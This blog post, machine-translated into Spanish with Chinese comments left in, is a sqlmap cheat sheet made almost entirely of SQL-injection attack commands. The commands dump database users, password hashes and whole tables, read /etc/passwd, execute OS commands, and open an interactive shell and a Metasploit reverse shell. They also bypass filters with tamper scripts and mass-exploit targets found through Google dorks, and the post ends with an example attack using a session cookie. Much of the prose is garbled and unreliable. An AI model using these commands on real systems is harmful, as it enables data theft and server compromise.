uso sqlmap (Actualización)

En el estudio anterior aquí, vi un malentendido, que se inyecta en el éxito (y van de la nota) y luego no sabe qué hacer.

privilegios de root Los usuarios comunes
El uso de herramientas Una de las claves para obtener toda la información (por lo general para obtener información sobre la versión de la base de datos significa el final) Ser puesto justo al lado de la carga caballo
inyección manual Y conectando cada consulta las tablas de consulta (El objetivo final es conseguir que todos los datos) Ser puesto justo al lado de la carga caballo

Empecemos en el cuerpo

Pruebas de distintas secciones de la herramienta de inyección SQL, finalmente encontrado sqlmap el más potente, con quién sabe quién!
sqlmap -update

-h, -help Muestra información básica de ayuda y sale

Superior hh información de la pantalla de ayuda y sale


Los pasos básicos

sqlmap -u "http://url/news?id=1" --current-user #获取当前用户名称
sqlmap -u "http://www.xxoo.com/news?id=1" --current-db #获取当前数据库名称
sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #列表名
sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #列字段
sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D"db_name" -v 0 #获取字段内容


El contenido básico

sqlmap -u "http://url/news?id=1" --smart --level 3 --users # smart 智能 level 执行测试等级
sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms 指定数据库类型
sqlmap -u "http://url/news?id=1" --users #列数据库用户
sqlmap -u "http://url/news?id=1" --dbs#列数据库
sqlmap -u "http://url/news?id=1" --passwords #数据库用户密码
sqlmap -u "http://url/news?id=1" --passwords-U root -v 0 #列出指定用户数据库密码
sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 #列出指定字段,列出 20 条
sqlmap -u "http://url/news?id=1" --dump-all -v 0 #列出所有数据库所有表
sqlmap -u "http://url/news?id=1" --privileges #查看权限
sqlmap -u "http://url/news?id=1" --privileges -U root #查看指定用户权限
sqlmap -u "http://url/news?id=1" --is-dba -v 1 #是否是数据库管理员
sqlmap -u "http://url/news?id=1" --roles #枚举数据库用户角色
sqlmap -u "http://url/news?id=1" --udf-inject #导入用户自定义函数(获取系统权限!)
sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 #列出当前库所有表
sqlmap -u "http://url/news?id=1" --union-cols #union 查询表记录
sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie 注入
sqlmap -u "http://url/news?id=1" -b #获取 banner 信息
sqlmap -u "http://url/news?id=1" --data "id=3" #post 注入
sqlmap -u "http://url/news?id=1" -v 1 -f #指纹判别数据库类型
sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8080" #代理注入
sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE" #指定关键词
sqlmap -u "http://url/news?id=1" --sql-shell #执行指定 sql 命令
sqlmap -u "http://url/news?id=1" --file /etc/passwd
sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令
sqlmap -u "http://url/news?id=1" --os-shell #系统交互 shell
sqlmap -u "http://url/news?id=1" --os-pwn #反弹 shell
sqlmap -u "http://url/news?id=1" --reg-read #读取 win 系统注册表
sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log" #保存进度
sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume #恢复已保存进度
sqlmap -u "http://url/news?id=1" --msf-path=/opt/metasploit3/msf2 --os-pwn #反弹 shell 需
metasploit 路径
sqlmap -u "http://url/news?id=1" --tamper "base64encode.py" #加载脚本(可利用绕过注入限制,很重要)
sqlmap -g "google 语法" --dump-all --batch #google #搜索注入点自动 跑出所有字段
Ejemplo Ataque:
sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d
28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password

Ooo, ooo, esto es ah tan duro (T_T)

emmm, dos encontraron una buena cosa.

comando anterior Gangster acabado sqlmap , parece que sólo hay que añadir un pequeño diagrama en la línea (manual divertido).

Aquí Insertar imagen Descripción

emmmm, medidas concretas y prácticas para continuar, en espera de complemento, no puedo esperar para empezar a aprender la vulnerabilidad de subida

Publicado 13 artículos originales · ganado elogios 0 · Vistas 449

Supongo que te gusta

Origin blog.csdn.net/m0_46230316/article/details/105290227
Recomendado
Clasificación